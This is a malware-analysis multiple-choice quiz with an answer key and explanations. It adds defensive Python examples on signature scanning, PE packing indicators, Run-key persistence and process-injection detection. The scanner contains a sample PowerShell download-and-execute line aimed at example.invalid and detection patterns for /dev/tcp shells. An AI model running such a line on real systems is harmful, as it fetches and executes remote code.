Question 1: Which of the following tools is primarily used for dynamic analysis of malware?
- A. IDA Pro
- B. Ghidra
- C. Process Monitor
- D. Hex-Rays Decompiler
Answer
Answer: C. Process Monitor
Explanation: Process Monitor (a Sysinternals tool) captures real-time file system, registry, process/thread and network activity on a live Windows system, so it is used while the sample is executing, which is what dynamic analysis means. IDA Pro, Ghidra and the Hex-Rays Decompiler work on the binary without running it and belong to static analysis.
Question 2: What is the main purpose of a sandbox environment in malware analysis?
- A. To decrypt encrypted malware samples
- B. To reverse-engineer malware binary code
- C. To isolate and monitor malware behavior safely
- D. To compile source code of malware
Answer
Answer: C. To isolate and monitor malware behavior safely
Explanation: A sandbox provides a controlled and isolated environment (typically a snapshot-restorable VM with filtered or simulated network access) where malware can be executed without risk to the host or the production network, allowing analysts to observe its behavior and impact. Sandbox-aware samples check for VM artifacts, debuggers or short uptime and stay dormant, so a clean sandbox run does not prove a file is benign.
Question 3: Which malware detection technique compares a file’s binary code to known malicious code patterns?
- A. Behavioral detection
- B. Signature-based detection
- C. Heuristic analysis
- D. Anomaly-based detection
Answer
Answer: B. Signature-based detection
Explanation: Signature-based detection identifies malware by matching its bytes (hashes, byte sequences or YARA-style patterns) against a database of known malware signatures. It is fast and produces few false positives, but it cannot detect zero-day threats and is defeated by polymorphic, packed or otherwise obfuscated code, because any change to the matched bytes breaks the match.
Question 4: What is the primary goal of code obfuscation in malware?
- A. To reduce the size of the malware
- B. To improve malware performance
- C. To hide the malware’s true functionality
- D. To exploit system vulnerabilities
Answer
Answer: C. To hide the malware’s true functionality
Explanation: Obfuscation is a technique used by attackers to make malware code more difficult to read or analyze, thereby evading detection and delaying reverse engineering efforts.
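The two explanations above are easiest to see side by side. The following Python example, added here and not part of the original quiz, implements a toy byte-pattern signature scanner, runs it over a constructed download-cradle payload, then XOR-obfuscates that payload and scans again. The signature set, the sample payload and the key are all invented for the demonstration; they are not rules from any real product.

```python
import re
from typing import List

# Constructed toy signature set: a name and a byte-level regex per signature.
# These are illustrative patterns for the demo, not rules from any real AV product.
SIGNATURES = {
    "eicar_fragment": re.compile(rb"EICAR-STANDARD-ANTIVIRUS-TEST-FILE"),
    "ps_download_cradle": re.compile(
        rb"powershell(?:\.exe)?[^\n]{0,80}?DownloadString", re.IGNORECASE),
    "bash_dev_tcp_shell": re.compile(rb"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}"),
}

def scan(data: bytes) -> List[str]:
    """Signature-based detection: report every pattern that occurs verbatim in the bytes."""
    return [name for name, pat in SIGNATURES.items() if pat.search(data)]

def xor_obfuscate(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the simplest obfuscation a dropper applies to its payload (it is its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Constructed sample payload: a download-and-execute stub that should hit exactly one signature.
SAMPLE = (b'cmd /c powershell -nop -w hidden -c "IEX (New-Object Net.WebClient)'
          b".DownloadString('http://example.invalid/a.ps1')\"")

KEY = b"\x5a\xa5"  # arbitrary demo key

def demo():
    """Returns (hits on plain payload, hits on XOR-obfuscated payload, hits after de-obfuscation)."""
    obfuscated = xor_obfuscate(SAMPLE, KEY)
    return scan(SAMPLE), scan(obfuscated), scan(xor_obfuscate(obfuscated, KEY))

if __name__ == "__main__":
    plain, obf, restored = demo()
    print("plain:        ", plain)     # the cradle signature fires
    print("obfuscated:   ", obf)       # nothing fires: the bytes no longer match any pattern
    print("de-obfuscated:", restored)  # the behaviour is unchanged, only the on-disk form was
```

The third result is the practical point: the payload's functionality never changed, so a detector that wants to catch the obfuscated copy must either match the decoder stub itself or let the sample run (dynamic analysis) and scan what it decodes in memory.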
Question 5: Which malware type disguises itself as legitimate software to deceive users?
- A. Worm
- B. Trojan horse
- C. Rootkit
- D. Adware
Answer
Answer: B. Trojan horse
Explanation: A Trojan horse appears to be a legitimate application (an installer, a cracked tool, an "invoice" document) but carries a malicious payload that compromises the system once the user runs it. Unlike a worm it does not self-replicate; it relies on the user being deceived into executing it.
Question 6: Which of the following is a key indicator of a packed malware sample?
- A. Presence of clear-text strings
- B. Unusual section names in PE header
- C. Large import table
- D. Absence of suspicious API calls
Answer
Answer: B. Unusual section names in PE header
Explanation: Packed executables often carry abnormal or packer-specific section names in the PE (Portable Executable) header (UPX, for example, writes UPX0 and UPX1; other packers use their own names), usually together with a section of very high entropy, a section whose raw size is zero but whose virtual size is large (the unpack target), and a tiny import table that lists little more than LoadLibrary and GetProcAddress. A large import table (option C) argues against packing, since the packer stub resolves most imports itself at runtime.
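The indicators in the explanation above can be checked with nothing more than the PE section table. The Python example below is added here and is not part of the original quiz or of any real tool: it walks the DOS header, PE signature, COFF header and section headers with the struct module, computes Shannon entropy per section, and flags packer names, high entropy and zero-raw-size sections. Because it must run offline, it also builds two constructed, header-only PE images (not runnable EXEs) to scan, one "normal" and one UPX-style; the section contents and names in those images are invented for the demonstration.

```python
import hashlib
import math
import struct
from typing import Dict, List, Tuple

# Section names a normal MSVC/MinGW build emits; anything else deserves a look.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".idata", ".edata",
                   ".rsrc", ".reloc", ".bss", ".tls", ".CRT", ".xdata"}
# Section names written by well-known packers (UPX really uses UPX0/UPX1, not ".UPX").
PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".MPRESS1", ".MPRESS2",
                   ".themida", ".vmp0", ".vmp1", ".petite", ".nsp0", ".nsp1"}

def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: ~0 for padding, ~4-6 for code and text, >7 for compressed or encrypted data."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_sections(pe: bytes) -> List[Dict]:
    """DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table, using only struct."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size            # section headers start right after the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, _vaddr, rsize, rptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        raw = pe[rptr:rptr + rsize]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "raw_size": rsize,
                         "entropy": round(shannon_entropy(raw), 2)})
    return sections

def packing_indicators(pe: bytes) -> List[str]:
    """Human-readable findings; an empty list means no packing indicator in the section table."""
    findings = []
    for s in parse_sections(pe):
        if s["name"] in PACKER_SECTIONS:
            findings.append(f"{s['name']}: known packer section name")
        elif s["name"] not in COMMON_SECTIONS:
            findings.append(f"{s['name']}: unusual section name")
        if s["entropy"] > 7.0:
            findings.append(f"{s['name']}: high entropy {s['entropy']} (compressed/encrypted data)")
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            findings.append(f"{s['name']}: zero raw size but {s['virtual_size']:#x} bytes virtual (unpack target)")
    return findings

def build_pe(sections: List[Tuple[str, bytes, int]]) -> bytes:
    """Constructed minimal PE image for the demo: DOS stub, COFF header, zeroed PE32 optional header,
    section table and raw data laid out back to back. Parseable, not executable."""
    opt_size, e_lfanew = 224, 64
    data_start = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    table, blobs, ptr = b"", b"", data_start
    for name, data, vsize in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             vsize, 0x1000, len(data), ptr, 0, 0, 0, 0, 0x60000020)
        blobs += data
        ptr += len(data)
    return dos + b"PE\0\0" + coff + b"\0" * opt_size + table + blobs

# Constructed section contents: deterministic pseudo-random bytes stand in for a compressed payload.
HIGH_ENTROPY = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))   # 4096 bytes
TEXT_LIKE = b"Ordinary code and strings would sit here in a normal build. " * 64
UNPACKED = build_pe([(".text", TEXT_LIKE, len(TEXT_LIKE)), (".data", b"config=1\0" * 64, 576)])
PACKED = build_pe([("UPX0", b"", 0x20000), ("UPX1", HIGH_ENTROPY, len(HIGH_ENTROPY)), (".rsrc", b"\0" * 64, 64)])

if __name__ == "__main__":
    for label, img in (("unpacked", UNPACKED), ("packed", PACKED)):
        print(label, parse_sections(img))
        for f in packing_indicators(img):
            print("  !", f)
```

On a real sample the same parser works unchanged on the file bytes; the threshold of 7.0 bits is a rule of thumb, and a .rsrc section holding an embedded PNG or certificate will also score high, so treat entropy as one indicator among several rather than proof.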
Question 7: In reverse engineering malware, what is the role of disassemblers like IDA Pro or Ghidra?
- A. Encrypt the malware code for secure storage
- B. Emulate malware behavior in real-time
- C. Convert binary code into assembly code
- D. Analyze network traffic from malware
Answer
Answer: C. Convert binary code into assembly code
Explanation: Disassemblers translate compiled binary code into human-readable assembly instructions, helping analysts understand the underlying logic and behavior of the malware.
Question 8: What is a common sign of malware persistence on a Windows system?
- A. Malware deletes itself after execution
- B. Registry key entries in Run or RunOnce paths
- C. Use of standard system calls only
- D. No change to system boot sequence
Answer
Answer: B. Registry key entries in Run or RunOnce paths
Explanation: Malware often writes a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run (or RunOnce, or the HKLM equivalents) pointing at its own executable so that it is launched again at every logon, maintaining persistence across reboots. The same goal is reached through scheduled tasks, services, the Startup folder and WMI subscriptions, so Run keys are the first but not the only place to look; a sample that deletes itself (option A) is avoiding forensics, not persisting.
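Questions 1 and 8 meet in practice when a Process Monitor capture is searched for autostart writes. The Python example below is added here and is not part of the original quiz: it reads a Procmon CSV export (the default column layout, Time of Day, Process Name, PID, Operation, Path, Result, Detail) and reports every successful RegSetValue under a Run, RunOnce, RunOnceEx or RunServices key together with the command that was stored. The five log rows are constructed for the demonstration and include a benign read, a denied write and an unrelated write so the filter has something to reject.

```python
import csv
import io
import re
from typing import Dict, List

# Autostart keys under HKCU or HKLM, including the WOW6432Node view; the value name follows the last backslash.
AUTORUN_KEYS = re.compile(
    r"\\Software\\(?:WOW6432Node\\)?Microsoft\\Windows\\CurrentVersion\\"
    r"(?:Run|RunOnce|RunOnceEx|RunServices)(?:\\|$)",
    re.IGNORECASE)

# Constructed Procmon CSV export (default columns). Process, paths and values are invented for the demo.
PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:02:11.0051234 AM","explorer.exe","4120","RegQueryValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive","SUCCESS","Type: REG_SZ, Length: 80, Data: C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"
"10:02:14.1183321 AM","invoice_2024.exe","7788","CreateFile","C:\Users\alice\AppData\Roaming\svchosts.exe","SUCCESS","Desired Access: Generic Write"
"10:02:14.1201099 AM","invoice_2024.exe","7788","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdateSvc","SUCCESS","Type: REG_SZ, Length: 96, Data: C:\Users\alice\AppData\Roaming\svchosts.exe"
"10:02:14.1250000 AM","invoice_2024.exe","7788","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Cleanup","ACCESS DENIED","Type: REG_SZ, Length: 40, Data: cmd /c del invoice_2024.exe"
"10:02:15.0000000 AM","svchost.exe","1044","RegSetValue","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
'''

def autorun_writes(procmon_csv: str) -> List[Dict[str, str]]:
    """Return every successful registry write that lands under an autostart key.

    Reads are ignored (explorer legitimately queries Run at logon), as are failed writes:
    a denied RunOnce write is still interesting for triage but did not achieve persistence.
    """
    hits = []
    for row in csv.DictReader(io.StringIO(procmon_csv)):
        if row["Operation"] not in ("RegSetValue", "RegCreateKey"):
            continue
        if row["Result"] != "SUCCESS" or not AUTORUN_KEYS.search(row["Path"]):
            continue
        data = re.search(r"Data: (.*)$", row["Detail"])
        hits.append({
            "time": row["Time of Day"],
            "process": row["Process Name"],
            "pid": row["PID"],
            "value": row["Path"].rsplit("\\", 1)[-1],
            "command": data.group(1) if data else "",
        })
    return hits

if __name__ == "__main__":
    for h in autorun_writes(PROCMON_CSV):
        print(f"{h['time']} {h['process']}({h['pid']}) set Run\\{h['value']} -> {h['command']}")
```

In a real capture the same filter is usually paired with a CreateFile write to the path the Run value points at (the dropped binary), which is the second constructed row above: the pair tells you both the persistence mechanism and the artifact to collect.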
Question 9: Which of the following is a primary limitation of static malware analysis?
- A. Requires an internet connection
- B. Cannot analyze the network behavior of malware
- C. Detects only macro-based malware
- D. Cannot be performed on compiled binaries
Answer
Answer: B. Cannot analyze the network behavior of malware
Explanation: Static analysis examines the file without executing it, so it can recover hard-coded domains, IP addresses or URLs from strings, but it cannot observe what the sample actually does at runtime: the command-and-control traffic it sends, the files it drops, or code it only decrypts in memory. Option D is wrong because static analysis is routinely performed on compiled binaries; that is precisely what disassemblers and decompilers are for.
Question 10: Which Windows API function is commonly used by malware for process injection?
- A. CreateProcess()
- B. VirtualAllocEx()
- C. GetProcAddress()
- D. MessageBox()
Answer
Answer: B. VirtualAllocEx()
Explanation: VirtualAllocEx() allocates memory in another process's address space, which is a critical step in the classic injection chain: OpenProcess() to obtain a handle, VirtualAllocEx() to reserve a (usually PAGE_EXECUTE_READWRITE) region, WriteProcessMemory() to copy the payload or DLL path into it, and CreateRemoteThread() to execute it. None of the individual calls is malicious on its own (debuggers use them), so detections look for the whole sequence against a handle to a foreign process, not for VirtualAllocEx() alone.
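The point that the sequence, not the single call, is the signal can be shown with a small correlator. The Python example below is added here and is not part of the original quiz: it walks a constructed API-call trace of the kind a hooking sandbox produces, tracks OpenProcess handles and VirtualAllocEx regions per caller, and reports a chain only when WriteProcessMemory and CreateRemoteThread hit the same remote region. The trace, process IDs, handles and addresses are invented; the API names, the 0x40 protection constant and the -1 pseudo-handle are real Windows values.

```python
from typing import Dict, List, Tuple

PAGE_EXECUTE_READWRITE = 0x40
CURRENT_PROCESS = 0xFFFFFFFFFFFFFFFF   # value of the GetCurrentProcess() pseudo-handle

# Constructed trace: (caller pid, API name, arguments incl. return value). Not a real capture.
TRACE = [
    (5120, "OpenProcess",        {"dwDesiredAccess": 0x1F0FFF, "dwProcessId": 2244, "ret": 0x2A8}),
    (5120, "VirtualAllocEx",     {"hProcess": 0x2A8, "dwSize": 0x1000, "flProtect": 0x40, "ret": 0x1E0000}),
    (5120, "WriteProcessMemory", {"hProcess": 0x2A8, "lpBaseAddress": 0x1E0000, "nSize": 0x3C0}),
    (5120, "CreateRemoteThread", {"hProcess": 0x2A8, "lpStartAddress": 0x1E0000}),
    # A different process allocating read/write memory in itself: the same API, no injection.
    (6004, "VirtualAllocEx",     {"hProcess": CURRENT_PROCESS, "dwSize": 0x10000, "flProtect": 0x04, "ret": 0x2B0000}),
    (6004, "MessageBoxW",        {"hWnd": 0, "lpText": "Done"}),
]

def find_injection_chains(trace) -> List[Dict]:
    """Correlate OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread per (caller, handle)."""
    targets: Dict[Tuple[int, int], int] = {}   # (caller pid, handle) -> target pid from OpenProcess
    regions: Dict[Tuple[int, int], Dict] = {}  # (caller pid, handle) -> allocated region state
    chains = []
    for pid, api, a in trace:
        key = (pid, a.get("hProcess", a.get("ret")))
        if api == "OpenProcess":
            targets[(pid, a["ret"])] = a["dwProcessId"]
        elif api == "VirtualAllocEx" and a["hProcess"] != CURRENT_PROCESS:
            regions[key] = {"base": a["ret"], "size": a["dwSize"],
                            "rwx": a["flProtect"] == PAGE_EXECUTE_READWRITE, "written": False}
        elif api == "WriteProcessMemory":
            r = regions.get(key)
            if r and r["base"] <= a["lpBaseAddress"] < r["base"] + r["size"]:
                r["written"] = True
        elif api == "CreateRemoteThread":
            r = regions.get(key)
            if r and r["written"] and r["base"] <= a["lpStartAddress"] < r["base"] + r["size"]:
                chains.append({"injector": pid, "target": targets.get(key),
                               "base": r["base"], "rwx": r["rwx"]})
    return chains

if __name__ == "__main__":
    for c in find_injection_chains(TRACE):
        print(f"pid {c['injector']} injected into pid {c['target']} at {c['base']:#x} (RWX={c['rwx']})")
```

The state is keyed on the handle rather than the target PID because that is all the later calls carry; a trace that lacks the OpenProcess row (handle inherited or duplicated) still produces a chain, just with an unknown target, which is why the lookup uses get() instead of failing.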